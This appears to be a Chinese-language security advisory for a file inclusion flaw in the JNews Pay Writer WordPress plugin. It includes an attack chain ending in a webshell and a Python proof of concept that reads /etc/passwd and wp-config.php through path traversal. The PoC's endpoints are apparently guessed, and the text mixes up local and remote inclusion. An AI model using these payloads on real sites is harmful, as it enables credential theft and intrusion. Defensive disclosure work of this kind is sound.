CVE-2025-68905: WordPress JNews Pay Writer插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-68905

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

jegtheme JNews - Pay Writer (jnews-pay-writer)

漏洞概述

CVE-2025-68905是WordPress插件jnews-pay-writer中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含类型，具体为"不正确的文件名控制用于Include/Require语句"。漏洞源于插件在处理文件包含请求时未对用户输入进行充分的验证和过滤，攻击者可以通过构造恶意请求包含服务器上的任意本地文件。此漏洞影响jnews-pay-writer 11.0.0及以下所有版本。攻击者利用该漏洞可以读取服务器上的敏感文件，如WordPress配置文件(wp-config.php)、系统配置文件(/etc/passwd)等，可能导致数据库凭证泄露、API密钥外泄等严重后果。鉴于该漏洞的网络可利用性和低权限要求，强烈建议受影响的用户立即采取修复措施。

技术细节

该漏洞是典型的PHP文件包含类安全缺陷。在jnews-pay-writer插件的某些功能模块中，程序直接使用用户可控的请求参数作为文件路径进行include或require操作，而未进行路径规范化、安全路径检查或输入验证。攻击者可以通过目录遍历技术(如使用../序列)结合文件包含功能，突破预期的文件访问范围。例如，攻击者可能通过构造类似?action=some_action&file=../../../../wp-config的请求，尝试包含WordPress的配置文件。成功利用此漏洞可实现以下攻击效果：(1)读取任意本地文件内容，包括配置文件中存储的数据库凭证、管理员凭据等敏感信息；(2)结合其他漏洞(如文件上传)可能实现远程代码执行；(3)读取日志文件可能获取系统路径信息，为进一步攻击提供情报支持。该漏洞的利用难度为高(AC:H)，因为攻击者需要准确了解目标系统的文件结构，但一旦利用成功，影响范围广泛。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站是否使用WordPress CMS，并检测是否安装了jnews-pay-writer插件(版本<=11.0.0)。可通过查看页面源码、扫描/wp-content/plugins/路径等方式确认。

STEP 2

步骤2: 漏洞探测

攻击者访问插件的潜在漏洞端点(如admin-ajax.php)，尝试使用不同的参数名称(action、file、view等)发送包含路径遍历序列的请求，验证文件包含功能是否可用。

STEP 3

步骤3: 敏感文件读取

确认漏洞存在后，攻击者构造恶意请求尝试读取服务器敏感文件。首先尝试读取/etc/passwd验证漏洞，然后逐步尝试读取WordPress配置文件wp-config.php以获取数据库凭据和认证密钥。

STEP 4

步骤4: 权限提升与持久化

获取数据库凭据后，攻击者可以通过数据库管理功能创建管理员账户或修改现有用户密码，实现网站后台持久化控制。

STEP 5

步骤5: 远程代码执行

如果存在文件上传功能或日志文件注入点，攻击者可能通过LFI包含恶意上传的PHP文件或包含写入Webshell的日志文件，最终实现服务器远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68905 PoC - Local File Inclusion in jnews-pay-writer
# Affected: jnews-pay-writer <= 11.0.0

import requests
import sys

def test_lfi(target_url, file_path='/etc/passwd'):
    """Test for LFI vulnerability in jnews-pay-writer plugin"""
    
    # Common vulnerable endpoints in WordPress plugins
    paths_to_test = [
        '/wp-admin/admin-ajax.php',
        '/wp-content/plugins/jnews-pay-writer/include/file.php',
        '/wp-content/plugins/jnews-pay-writer/framework/modules/file.php'
    ]
    
    # LFI parameters commonly found in WordPress plugins
    params_to_test = [
        {'action': 'jnews_pay_writer_file', 'file': file_path},
        {'action': 'jnews_pay_writer_include', 'file': file_path},
        {'view': file_path},
        {'module': file_path}
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    
    for path in paths_to_test:
        for params in params_to_test:
            try:
                url = target_url.rstrip('/') + path
                response = requests.get(url, params=params, timeout=10)
                
                if file_path.split('/')[-1] in response.text or 'root:' in response.text:
                    print(f"[+] VULNERABLE! {url} with params {params}")
                    print(f"[+] Content preview:\n{response.text[:500]}")
                    return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Error testing {url}: {e}")
    
    print("[-] No vulnerability detected with basic tests")
    return False

# Directory traversal variants
def generate_payloads():
    """Generate directory traversal payloads"""
    base_files = [
        '../../../wp-config.php',
        '../../../wp-content/debug.log',
        '../../../../etc/passwd',
        '../../../../etc/hosts',
        '../../../../../var/www/html/wp-config.php'
    ]
    return base_files

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python {sys.argv[0]} http://example.com /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else '/etc/passwd'
    
    test_lfi(target, file_to_read)
    
    print("\n[*] Testing with multiple payloads:")
    for payload in generate_payloads():
        test_lfi(target, payload)

影响范围

jnews-pay-writer <= 11.0.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1)临时禁用jnews-pay-writer插件；(2)通过Web应用防火墙规则拦截包含路径遍历字符的请求参数；(3)限制PHP的allow_url_fopen和allow_url_include配置；(4)设置open_basedir限制PHP可访问的目录范围；(5)启用ModSecurity等WAF规则阻止常见的文件包含攻击模式。建议尽快关注插件官方更新并及时升级到修补版本。